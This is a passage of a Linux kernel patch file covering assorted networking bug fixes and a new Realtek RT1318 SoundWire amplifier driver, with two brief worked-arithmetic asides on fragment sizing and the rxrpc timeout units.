++		__skb_fill_page_desc(skb, i, head, 0, psize);
+ 		head = (struct page *)page_private(head);
+ 	}
+ 	__skb_fill_page_desc(skb, new_frags - 1, head, 0, d_off);
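
To make the sizing arithmetic concrete, a worked example under assumed
values (PAGE_SIZE = 4096, MAX_SKB_FRAGS = 17, __skb_pagelen() = 80000):

	int order = 0, psize, new_frags;

	/* 17 * 4096 = 69632 < 80000, so bump to order 1 (17 * 8192 >= 80000) */
	while ((4096 << order) * 17 < 80000)
		order++;
	psize = 4096 << order;					/* 8192 */
	new_frags = (80000 + psize - 1) >> (12 + order);	/* ceil: 10 frags */
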
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 038398d41a937..940c0e27be735 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -580,8 +580,8 @@ static int ethtool_get_link_ksettings(struct net_device *dev,
+ static int ethtool_set_link_ksettings(struct net_device *dev,
+ 				      void __user *useraddr)
+ {
++	struct ethtool_link_ksettings link_ksettings = {};
+ 	int err;
+-	struct ethtool_link_ksettings link_ksettings;
+ 
+ 	ASSERT_RTNL();
+ 
+diff --git a/net/ipv6/sit.c b/net/ipv6/sit.c
+index 70d81bba50939..3ffb6a5b1f82a 100644
+--- a/net/ipv6/sit.c
++++ b/net/ipv6/sit.c
+@@ -1095,12 +1095,13 @@ tx_err:
+ 
+ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ {
++	struct ip_tunnel *tunnel = netdev_priv(dev);
++	int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 	struct net_device *tdev = NULL;
+-	struct ip_tunnel *tunnel;
++	int hlen = LL_MAX_HEADER;
+ 	const struct iphdr *iph;
+ 	struct flowi4 fl4;
+ 
+-	tunnel = netdev_priv(dev);
+ 	iph = &tunnel->parms.iph;
+ 
+ 	if (iph->daddr) {
+@@ -1123,14 +1124,15 @@ static void ipip6_tunnel_bind_dev(struct net_device *dev)
+ 		tdev = __dev_get_by_index(tunnel->net, tunnel->parms.link);
+ 
+ 	if (tdev && !netif_is_l3_master(tdev)) {
+-		int t_hlen = tunnel->hlen + sizeof(struct iphdr);
+ 		int mtu;
+ 
+ 		mtu = tdev->mtu - t_hlen;
+ 		if (mtu < IPV6_MIN_MTU)
+ 			mtu = IPV6_MIN_MTU;
+ 		WRITE_ONCE(dev->mtu, mtu);
++		hlen = tdev->hard_header_len + tdev->needed_headroom;
+ 	}
++	dev->needed_headroom = t_hlen + hlen;
+ }
+ 
+ static void ipip6_tunnel_update(struct ip_tunnel *t, struct ip_tunnel_parm *p,
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index c563a84d67b46..8d61efeab9c99 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1065,7 +1065,7 @@ static void tcp_v6_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			if (np->repflow)
+ 				label = ip6_flowlabel(ipv6h);
+ 			priority = sk->sk_priority;
+-			txhash = sk->sk_hash;
++			txhash = sk->sk_txhash;
+ 		}
+ 		if (sk->sk_state == TCP_TIME_WAIT) {
+ 			label = cpu_to_be32(inet_twsk(sk)->tw_flowlabel);
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index b635c194f0a85..62fb1031763d1 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -165,6 +165,7 @@ static int ncsi_aen_handler_cr(struct ncsi_dev_priv *ndp,
+ 	nc->state = NCSI_CHANNEL_INACTIVE;
+ 	list_add_tail_rcu(&nc->link, &ndp->channel_queue);
+ 	spin_unlock_irqrestore(&ndp->lock, flags);
++	nc->modes[NCSI_MODE_TX_ENABLE].enable = 0;
+ 
+ 	return ncsi_process_next_channel(ndp);
+ }
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index ac9335d76fb73..2af2ab924d64a 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2035,7 +2035,7 @@ retry:
+ 		goto retry;
+ 	}
+ 
+-	if (!dev_validate_header(dev, skb->data, len)) {
++	if (!dev_validate_header(dev, skb->data, len) || !skb->len) {
+ 		err = -EINVAL;
+ 		goto out_unlock;
+ 	}
+diff --git a/net/rxrpc/sendmsg.c b/net/rxrpc/sendmsg.c
+index d4e4e94f4f987..71e40f91dd398 100644
+--- a/net/rxrpc/sendmsg.c
++++ b/net/rxrpc/sendmsg.c
+@@ -736,7 +736,7 @@ int rxrpc_do_sendmsg(struct rxrpc_sock *rx, struct msghdr *msg, size_t len)
+ 		fallthrough;
+ 	case 1:
+ 		if (p.call.timeouts.hard > 0) {
+-			j = msecs_to_jiffies(p.call.timeouts.hard);
++			j = p.call.timeouts.hard * HZ;
+ 			now = jiffies;
+ 			j += now;
+ 			WRITE_ONCE(call->expect_term_by, j);
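
The hard timeout carried in p.call.timeouts.hard is a count of seconds, so
scaling by HZ restores the intended duration; treating the value as
milliseconds made calls expire three orders of magnitude too early. For
example (assuming HZ = 250):

	/* timeouts.hard = 30:
	 *   old: msecs_to_jiffies(30)  ->  8 jiffies   (~30 ms)
	 *   new: 30 * HZ               ->  7500 jiffies (30 s)
	 */
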
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index baeae5e5c8f0c..36395e5db3b40 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -262,7 +262,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 		goto out;
+ 	}
+ 
+-	if (unlikely(!(dev->flags & IFF_UP))) {
++	if (unlikely(!(dev->flags & IFF_UP)) || !netif_carrier_ok(dev)) {
+ 		net_notice_ratelimited("tc mirred to Houston: device %s is down\n",
+ 				       dev->name);
+ 		goto out;
+diff --git a/net/sched/cls_api.c b/net/sched/cls_api.c
+index 50566db45949b..7b2aa04a7cdfd 100644
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -1483,6 +1483,7 @@ static int tcf_block_bind(struct tcf_block *block,
+ 
+ err_unroll:
+ 	list_for_each_entry_safe(block_cb, next, &bo->cb_list, list) {
++		list_del(&block_cb->driver_list);
+ 		if (i-- > 0) {
+ 			list_del(&block_cb->list);
+ 			tcf_block_playback_offloads(block, block_cb->cb,
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 3f16ad1c37585..965ae55fa1607 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -199,6 +199,7 @@ config SND_SOC_ALL_CODECS
+ 	imply SND_SOC_RT715_SDCA_SDW
+ 	imply SND_SOC_RT1308_SDW
+ 	imply SND_SOC_RT1316_SDW
++	imply SND_SOC_RT1318_SDW
+ 	imply SND_SOC_RT9120
+ 	imply SND_SOC_SDW_MOCKUP
+ 	imply SND_SOC_SGTL5000
+@@ -1311,6 +1312,11 @@ config SND_SOC_RT1316_SDW
+ 	depends on SOUNDWIRE
+ 	select REGMAP_SOUNDWIRE
+ 
++config SND_SOC_RT1318_SDW
++	tristate "Realtek RT1318 Codec - SDW"
++	depends on SOUNDWIRE
++	select REGMAP_SOUNDWIRE
++
+ config SND_SOC_RT5514
+ 	tristate
+ 	depends on I2C
+diff --git a/sound/soc/codecs/Makefile b/sound/soc/codecs/Makefile
+index 9170ee1447dda..71d3ce5867e4f 100644
+--- a/sound/soc/codecs/Makefile
++++ b/sound/soc/codecs/Makefile
+@@ -196,6 +196,7 @@ snd-soc-rt1305-objs := rt1305.o
+ snd-soc-rt1308-objs := rt1308.o
+ snd-soc-rt1308-sdw-objs := rt1308-sdw.o
+ snd-soc-rt1316-sdw-objs := rt1316-sdw.o
++snd-soc-rt1318-sdw-objs := rt1318-sdw.o
+ snd-soc-rt274-objs := rt274.o
+ snd-soc-rt286-objs := rt286.o
+ snd-soc-rt298-objs := rt298.o
+@@ -551,6 +552,7 @@ obj-$(CONFIG_SND_SOC_RT1305)	+= snd-soc-rt1305.o
+ obj-$(CONFIG_SND_SOC_RT1308)	+= snd-soc-rt1308.o
+ obj-$(CONFIG_SND_SOC_RT1308_SDW)	+= snd-soc-rt1308-sdw.o
+ obj-$(CONFIG_SND_SOC_RT1316_SDW)	+= snd-soc-rt1316-sdw.o
++obj-$(CONFIG_SND_SOC_RT1318_SDW)	+= snd-soc-rt1318-sdw.o
+ obj-$(CONFIG_SND_SOC_RT274)	+= snd-soc-rt274.o
+ obj-$(CONFIG_SND_SOC_RT286)	+= snd-soc-rt286.o
+ obj-$(CONFIG_SND_SOC_RT298)	+= snd-soc-rt298.o
+diff --git a/sound/soc/codecs/rt1316-sdw.c b/sound/soc/codecs/rt1316-sdw.c
+index ed0a114363621..154b6179b6dcd 100644
+--- a/sound/soc/codecs/rt1316-sdw.c
++++ b/sound/soc/codecs/rt1316-sdw.c
+@@ -585,7 +585,7 @@ static int rt1316_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
+  * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
+  * port_prep are not defined for now
+  */
+-static struct sdw_slave_ops rt1316_slave_ops = {
++static const struct sdw_slave_ops rt1316_slave_ops = {
+ 	.read_prop = rt1316_read_prop,
+ 	.update_status = rt1316_update_status,
+ };
+diff --git a/sound/soc/codecs/rt1318-sdw.c b/sound/soc/codecs/rt1318-sdw.c
+new file mode 100644
+index 0000000000000..c6ec86e97a6e7
+--- /dev/null
++++ b/sound/soc/codecs/rt1318-sdw.c
+@@ -0,0 +1,884 @@
++// SPDX-License-Identifier: GPL-2.0-only
++//
++// rt1318-sdw.c -- rt1318 SDCA ALSA SoC amplifier audio driver
++//
++// Copyright(c) 2022 Realtek Semiconductor Corp.
++//
++//
++#include <linux/delay.h>
++#include <linux/device.h>
++#include <linux/pm_runtime.h>
++#include <linux/mod_devicetable.h>
++#include <linux/module.h>
++#include <linux/regmap.h>
++#include <linux/dmi.h>
++#include <linux/firmware.h>
++#include <sound/core.h>
++#include <sound/pcm.h>
++#include <sound/pcm_params.h>
++#include <sound/soc-dapm.h>
++#include <sound/initval.h>
++#include "rt1318-sdw.h"
++
++static const struct reg_sequence rt1318_blind_write[] = {
++	{ 0xc001, 0x43 },
++	{ 0xc003, 0xa2 },
++	{ 0xc004, 0x44 },
++	{ 0xc005, 0x44 },
++	{ 0xc006, 0x33 },
++	{ 0xc007, 0x64 },
++	{ 0xc320, 0x20 },
++	{ 0xf203, 0x18 },
++	{ 0xf211, 0x00 },
++	{ 0xf212, 0x26 },
++	{ 0xf20d, 0x17 },
++	{ 0xf214, 0x06 },
++	{ 0xf20e, 0x00 },
++	{ 0xf223, 0x7f },
++	{ 0xf224, 0xdb },
++	{ 0xf225, 0xee },
++	{ 0xf226, 0x3f },
++	{ 0xf227, 0x0f },
++	{ 0xf21a, 0x78 },
++	{ 0xf242, 0x3c },
++	{ 0xc321, 0x0b },
++	{ 0xc200, 0xd8 },
++	{ 0xc201, 0x27 },
++	{ 0xc202, 0x0f },
++	{ 0xf800, 0x20 },
++	{ 0xdf00, 0x10 },
++	{ 0xdf5f, 0x01 },
++	{ 0xdf60, 0xa7 },
++	{ 0xc400, 0x0e },
++	{ 0xc401, 0x43 },
++	{ 0xc402, 0xe0 },
++	{ 0xc403, 0x00 },
++	{ 0xc404, 0x4c },
++	{ 0xc407, 0x02 },
++	{ 0xc408, 0x3f },
++	{ 0xc300, 0x01 },
++	{ 0xc206, 0x78 },
++	{ 0xc203, 0x84 },
++	{ 0xc120, 0xc0 },
++	{ 0xc121, 0x03 },
++	{ 0xe000, 0x88 },
++	{ 0xc321, 0x09 },
++	{ 0xc322, 0x01 },
++	{ 0xe706, 0x0f },
++	{ 0xe707, 0x30 },
++	{ 0xe806, 0x0f },
++	{ 0xe807, 0x30 },
++	{ 0xed00, 0xb0 },
++	{ 0xce04, 0x02 },
++	{ 0xce05, 0x63 },
++	{ 0xce06, 0x68 },
++	{ 0xce07, 0x07 },
++	{ 0xcf04, 0x02 },
++	{ 0xcf05, 0x63 },
++	{ 0xcf06, 0x68 },
++	{ 0xcf07, 0x07 },
++	{ 0xce60, 0xe3 },
++	{ 0xc130, 0x51 },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x06 },
++	{ 0xf109, 0x9b },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x0b },
++	{ 0xf109, 0x03 },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++	{ 0xf102, 0x00 },
++	{ 0xf103, 0x00 },
++	{ 0xf104, 0xf5 },
++	{ 0xf105, 0x0c },
++	{ 0xf109, 0x7f },
++	{ 0xf10a, 0x0b },
++	{ 0xf10b, 0x4c },
++	{ 0xf10b, 0x5c },
++
++	{ 0xe604, 0x00 },
++	{ 0xdb00, 0x0c },
++	{ 0xdd00, 0x0c },
++	{ 0xdc19, 0x00 },
++	{ 0xdc1a, 0xff },
++	{ 0xdc1b, 0xff },
++	{ 0xdc1c, 0xff },
++	{ 0xdc1d, 0x00 },
++	{ 0xdc1e, 0x00 },
++	{ 0xdc1f, 0x00 },
++	{ 0xdc20, 0xff },
++	{ 0xde19, 0x00 },
++	{ 0xde1a, 0xff },
++	{ 0xde1b, 0xff },
++	{ 0xde1c, 0xff },
++	{ 0xde1d, 0x00 },
++	{ 0xde1e, 0x00 },
++	{ 0xde1f, 0x00 },
++	{ 0xde20, 0xff },
++	{ 0xdb32, 0x00 },
++	{ 0xdd32, 0x00 },
++	{ 0xdb33, 0x0a },
++	{ 0xdd33, 0x0a },
++	{ 0xdb34, 0x1a },
++	{ 0xdd34, 0x1a },
++	{ 0xdb17, 0xef },
++	{ 0xdd17, 0xef },
++	{ 0xdba7, 0x00 },
++	{ 0xdba8, 0x64 },
++	{ 0xdda7, 0x00 },
++	{ 0xdda8, 0x64 },
++	{ 0xdb19, 0x40 },
++	{ 0xdd19, 0x40 },
++	{ 0xdb00, 0x4c },
++	{ 0xdb01, 0x79 },
++	{ 0xdd01, 0x79 },
++	{ 0xdb04, 0x05 },
++	{ 0xdb05, 0x03 },
++	{ 0xdd04, 0x05 },
++	{ 0xdd05, 0x03 },
++	{ 0xdbbb, 0x09 },
++	{ 0xdbbc, 0x30 },
++	{ 0xdbbd, 0xf0 },
++	{ 0xdbbe, 0xf1 },
++	{ 0xddbb, 0x09 },
++	{ 0xddbc, 0x30 },
++	{ 0xddbd, 0xf0 },
++	{ 0xddbe, 0xf1 },
++	{ 0xdb01, 0x79 },
++	{ 0xdd01, 0x79 },
++	{ 0xdc52, 0xef },
++	{ 0xde52, 0xef },
++	{ 0x2f55, 0x22 },
++};
++
++static const struct reg_default rt1318_reg_defaults[] = {
++	{ 0x3000, 0x00 },
++	{ 0x3004, 0x01 },
++	{ 0x3005, 0x23 },
++	{ 0x3202, 0x00 },
++	{ 0x3203, 0x01 },
++	{ 0x3206, 0x00 },
++	{ 0xc000, 0x00 },
++	{ 0xc001, 0x43 },
++	{ 0xc003, 0x22 },
++	{ 0xc004, 0x44 },
++	{ 0xc005, 0x44 },
++	{ 0xc006, 0x33 },
++	{ 0xc007, 0x64 },
++	{ 0xc008, 0x05 },
++	{ 0xc00a, 0xfc },
++	{ 0xc00b, 0x0f },
++	{ 0xc00c, 0x0e },
++	{ 0xc00d, 0xef },
++	{ 0xc00e, 0xe5 },
++	{ 0xc00f, 0xff },
++	{ 0xc120, 0xc0 },
++	{ 0xc121, 0x00 },
++	{ 0xc122, 0x00 },
++	{ 0xc123, 0x14 },
++	{ 0xc125, 0x00 },
++	{ 0xc200, 0x00 },
++	{ 0xc201, 0x00 },
++	{ 0xc202, 0x00 },
++	{ 0xc203, 0x04 },
++	{ 0xc204, 0x00 },
++	{ 0xc205, 0x00 },
++	{ 0xc206, 0x68 },
++	{ 0xc207, 0x70 },
++	{ 0xc208, 0x00 },
++	{ 0xc20a, 0x00 },
++	{ 0xc20b, 0x01 },
++	{ 0xc20c, 0x7f },
++	{ 0xc20d, 0x01 },
++	{ 0xc20e, 0x7f },
++	{ 0xc300, 0x00 },
++	{ 0xc301, 0x00 },
++	{ 0xc303, 0x80 },
++	{ 0xc320, 0x00 },
++	{ 0xc321, 0x09 },
++	{ 0xc322, 0x02 },
++	{ 0xc410, 0x04 },
++	{ 0xc430, 0x00 },
++	{ 0xc431, 0x00 },
++	{ 0xca00, 0x10 },
++	{ 0xca01, 0x00 },
++	{ 0xca02, 0x0b },
++	{ 0xca10, 0x10 },
++	{ 0xca11, 0x00 },
++	{ 0xca12, 0x0b },
++	{ 0xdd93, 0x00 },
++	{ 0xdd94, 0x64 },
++	{ 0xe300, 0xa0 },
++	{ 0xed00, 0x80 },
++	{ 0xed01, 0x0f },
++	{ 0xed02, 0xff },
++	{ 0xed03, 0x00 },
++	{ 0xed04, 0x00 },
++	{ 0xed05, 0x0f },
++	{ 0xed06, 0xff },
++	{ 0xf010, 0x10 },
++	{ 0xf011, 0xec },
++	{ 0xf012, 0x68 },
++	{ 0xf013, 0x21 },
++	{ 0xf800, 0x00 },
++	{ 0xf801, 0x12 },
++	{ 0xf802, 0xe0 },
++	{ 0xf803, 0x2f },
++	{ 0xf804, 0x00 },
++	{ 0xf805, 0x00 },
++	{ 0xf806, 0x07 },
++	{ 0xf807, 0xff },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0), 0x00 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L), 0x01 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R), 0x01 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23, RT1318_SDCA_CTL_REQ_POWER_STATE, 0), 0x03 },
++	{ SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0), 0x09 },
++};
++
++static bool rt1318_readable_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case 0x2f55:
++	case 0x3000:
++	case 0x3004 ... 0x3005:
++	case 0x3202 ... 0x3203:
++	case 0x3206:
++	case 0xc000 ... 0xc00f:
++	case 0xc120 ... 0xc125:
++	case 0xc200 ... 0xc20e:
++	case 0xc300 ... 0xc303:
++	case 0xc320 ... 0xc322:
++	case 0xc410:
++	case 0xc430 ... 0xc431:
++	case 0xca00 ... 0xca02:
++	case 0xca10 ... 0xca12:
++	case 0xcb00 ... 0xcb0b:
++	case 0xcc00 ... 0xcce5:
++	case 0xcd00 ... 0xcde5:
++	case 0xce00 ... 0xce6a:
++	case 0xcf00 ... 0xcf53:
++	case 0xd000 ... 0xd0cc:
++	case 0xd100 ... 0xd1b9:
++	case 0xdb00 ... 0xdc53:
++	case 0xdd00 ... 0xde53:
++	case 0xdf00 ... 0xdf6b:
++	case 0xe300:
++	case 0xeb00 ... 0xebcc:
++	case 0xec00 ... 0xecb9:
++	case 0xed00 ... 0xed06:
++	case 0xf010 ... 0xf014:
++	case 0xf800 ... 0xf807:
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23, RT1318_SDCA_CTL_REQ_POWER_STATE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_MODE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS, 0):
++		return true;
++	default:
++		return false;
++	}
++}
++
++static bool rt1318_volatile_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case 0x2f55:
++	case 0x3000 ... 0x3001:
++	case 0xc000:
++	case 0xc301:
++	case 0xc410:
++	case 0xc430 ... 0xc431:
++	case 0xdb06:
++	case 0xdb12:
++	case 0xdb1d ... 0xdb1f:
++	case 0xdb35:
++	case 0xdb37:
++	case 0xdb8a ... 0xdb92:
++	case 0xdbc5 ... 0xdbc8:
++	case 0xdc2b ... 0xdc49:
++	case 0xdd0b:
++	case 0xdd12:
++	case 0xdd1d ... 0xdd1f:
++	case 0xdd35:
++	case 0xdd8a ... 0xdd92:
++	case 0xddc5 ... 0xddc8:
++	case 0xde2b ... 0xde44:
++	case 0xdf4a ... 0xdf55:
++	case 0xe224 ... 0xe23b:
++	case 0xea01:
++	case 0xebc5:
++	case 0xebc8:
++	case 0xebcb ... 0xebcc:
++	case 0xed03 ... 0xed06:
++	case 0xf010 ... 0xf014:
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_MODE, 0):
++	case SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_SAPU, RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS, 0):
++		return true;
++	default:
++		return false;
++	}
++}
++
++static const struct regmap_config rt1318_sdw_regmap = {
++	.reg_bits = 32,
++	.val_bits = 8,
++	.readable_reg = rt1318_readable_register,
++	.volatile_reg = rt1318_volatile_register,
++	.max_register = 0x41081488,
++	.reg_defaults = rt1318_reg_defaults,
++	.num_reg_defaults = ARRAY_SIZE(rt1318_reg_defaults),
++	.cache_type = REGCACHE_RBTREE,
++	.use_single_read = true,
++	.use_single_write = true,
++};
++
++static int rt1318_read_prop(struct sdw_slave *slave)
++{
++	struct sdw_slave_prop *prop = &slave->prop;
++	int nval;
++	int i, j;
++	u32 bit;
++	unsigned long addr;
++	struct sdw_dpn_prop *dpn;
++
++	prop->scp_int1_mask = SDW_SCP_INT1_BUS_CLASH | SDW_SCP_INT1_PARITY;
++	prop->quirks = SDW_SLAVE_QUIRKS_INVALID_INITIAL_PARITY;
++	prop->is_sdca = true;
++
++	prop->paging_support = true;
++
++	/* first we need to allocate memory for set bits in port lists */
++	prop->source_ports = BIT(2);
++	prop->sink_ports = BIT(1);
++
++	nval = hweight32(prop->source_ports);
++	prop->src_dpn_prop = devm_kcalloc(&slave->dev, nval,
++		sizeof(*prop->src_dpn_prop), GFP_KERNEL);
++	if (!prop->src_dpn_prop)
++		return -ENOMEM;
++
++	i = 0;
++	dpn = prop->src_dpn_prop;
++	addr = prop->source_ports;
++	for_each_set_bit(bit, &addr, 32) {
++		dpn[i].num = bit;
++		dpn[i].type = SDW_DPN_FULL;
++		dpn[i].simple_ch_prep_sm = true;
++		dpn[i].ch_prep_timeout = 10;
++		i++;
++	}
++
++	/* do this again for sink now */
++	nval = hweight32(prop->sink_ports);
++	prop->sink_dpn_prop = devm_kcalloc(&slave->dev, nval,
++		sizeof(*prop->sink_dpn_prop), GFP_KERNEL);
++	if (!prop->sink_dpn_prop)
++		return -ENOMEM;
++
++	j = 0;
++	dpn = prop->sink_dpn_prop;
++	addr = prop->sink_ports;
++	for_each_set_bit(bit, &addr, 32) {
++		dpn[j].num = bit;
++		dpn[j].type = SDW_DPN_FULL;
++		dpn[j].simple_ch_prep_sm = true;
++		dpn[j].ch_prep_timeout = 10;
++		j++;
++	}
++
++	/* set the timeout values */
++	prop->clk_stop_timeout = 20;
++
++	return 0;
++}
++
++static int rt1318_io_init(struct device *dev, struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++
++	if (rt1318->hw_init)
++		return 0;
++
++	if (rt1318->first_hw_init) {
++		regcache_cache_only(rt1318->regmap, false);
++		regcache_cache_bypass(rt1318->regmap, true);
++	} else {
++		/*
++		 * PM runtime is only enabled when a Slave reports as Attached
++		 */
++
++		/* set autosuspend parameters */
++		pm_runtime_set_autosuspend_delay(&slave->dev, 3000);
++		pm_runtime_use_autosuspend(&slave->dev);
++
++		/* update count of parent 'active' children */
++		pm_runtime_set_active(&slave->dev);
++
++		/* make sure the device does not suspend immediately */
++		pm_runtime_mark_last_busy(&slave->dev);
++
++		pm_runtime_enable(&slave->dev);
++	}
++
++	pm_runtime_get_noresume(&slave->dev);
++
++	/* blind write */
++	regmap_multi_reg_write(rt1318->regmap, rt1318_blind_write,
++		ARRAY_SIZE(rt1318_blind_write));
++
++	if (rt1318->first_hw_init) {
++		regcache_cache_bypass(rt1318->regmap, false);
++		regcache_mark_dirty(rt1318->regmap);
++	}
++
++	/* Mark Slave initialization complete */
++	rt1318->first_hw_init = true;
++	rt1318->hw_init = true;
++
++	pm_runtime_mark_last_busy(&slave->dev);
++	pm_runtime_put_autosuspend(&slave->dev);
++
++	dev_dbg(&slave->dev, "%s hw_init complete\n", __func__);
++	return 0;
++}
++
++static int rt1318_update_status(struct sdw_slave *slave,
++					enum sdw_slave_status status)
++{
++	struct  rt1318_sdw_priv *rt1318 = dev_get_drvdata(&slave->dev);
++
++	/* Update the status */
++	rt1318->status = status;
++
++	if (status == SDW_SLAVE_UNATTACHED)
++		rt1318->hw_init = false;
++
++	/*
++	 * Perform initialization only if slave status is present and
++	 * hw_init flag is false
++	 */
++	if (rt1318->hw_init || rt1318->status != SDW_SLAVE_ATTACHED)
++		return 0;
++
++	/* perform I/O transfers required for Slave initialization */
++	return rt1318_io_init(&slave->dev, slave);
++}
++
++static int rt1318_classd_event(struct snd_soc_dapm_widget *w,
++	struct snd_kcontrol *kcontrol, int event)
++{
++	struct snd_soc_component *component =
++		snd_soc_dapm_to_component(w->dapm);
++	struct rt1318_sdw_priv *rt1318 = snd_soc_component_get_drvdata(component);
++	unsigned char ps0 = 0x0, ps3 = 0x3;
++
++	switch (event) {
++	case SND_SOC_DAPM_POST_PMU:
++		regmap_write(rt1318->regmap,
++			SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23,
++				RT1318_SDCA_CTL_REQ_POWER_STATE, 0),
++				ps0);
++		break;
++	case SND_SOC_DAPM_PRE_PMD:
++		regmap_write(rt1318->regmap,
++			SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23,
++				RT1318_SDCA_CTL_REQ_POWER_STATE, 0),
++				ps3);
++		break;
++
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++static const char * const rt1318_rx_data_ch_select[] = {
++	"L,R",
++	"L,L",
++	"L,R",
++	"L,L+R",
++	"R,L",
++	"R,R",
++	"R,L+R",
++	"L+R,L",
++	"L+R,R",
++	"L+R,L+R",
++};
++
++static SOC_ENUM_SINGLE_DECL(rt1318_rx_data_ch_enum,
++	SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0), 0,
++	rt1318_rx_data_ch_select);
++
++static const struct snd_kcontrol_new rt1318_snd_controls[] = {
++
++	/* UDMPU Cluster Selection */
++	SOC_ENUM("RX Channel Select", rt1318_rx_data_ch_enum),
++};
++
++static const struct snd_kcontrol_new rt1318_sto_dac =
++	SOC_DAPM_DOUBLE_R("Switch",
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L),
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R),
++		0, 1, 1);
++
++static const struct snd_soc_dapm_widget rt1318_dapm_widgets[] = {
++	/* Audio Interface */
++	SND_SOC_DAPM_AIF_IN("DP1RX", "DP1 Playback", 0, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_AIF_OUT("DP2TX", "DP2 Capture", 0, SND_SOC_NOPM, 0, 0),
++
++	/* Digital Interface */
++	SND_SOC_DAPM_SWITCH("DAC", SND_SOC_NOPM, 0, 0, &rt1318_sto_dac),
++
++	/* Output */
++	SND_SOC_DAPM_PGA_E("CLASS D", SND_SOC_NOPM, 0, 0, NULL, 0,
++		rt1318_classd_event, SND_SOC_DAPM_PRE_PMD | SND_SOC_DAPM_POST_PMU),
++	SND_SOC_DAPM_OUTPUT("SPOL"),
++	SND_SOC_DAPM_OUTPUT("SPOR"),
++	/* Input */
++	SND_SOC_DAPM_PGA("FB Data", SND_SOC_NOPM, 0, 0, NULL, 0),
++	SND_SOC_DAPM_SIGGEN("FB Gen"),
++};
++
++static const struct snd_soc_dapm_route rt1318_dapm_routes[] = {
++	{ "DAC", "Switch", "DP1RX" },
++	{ "CLASS D", NULL, "DAC" },
++	{ "SPOL", NULL, "CLASS D" },
++	{ "SPOR", NULL, "CLASS D" },
++
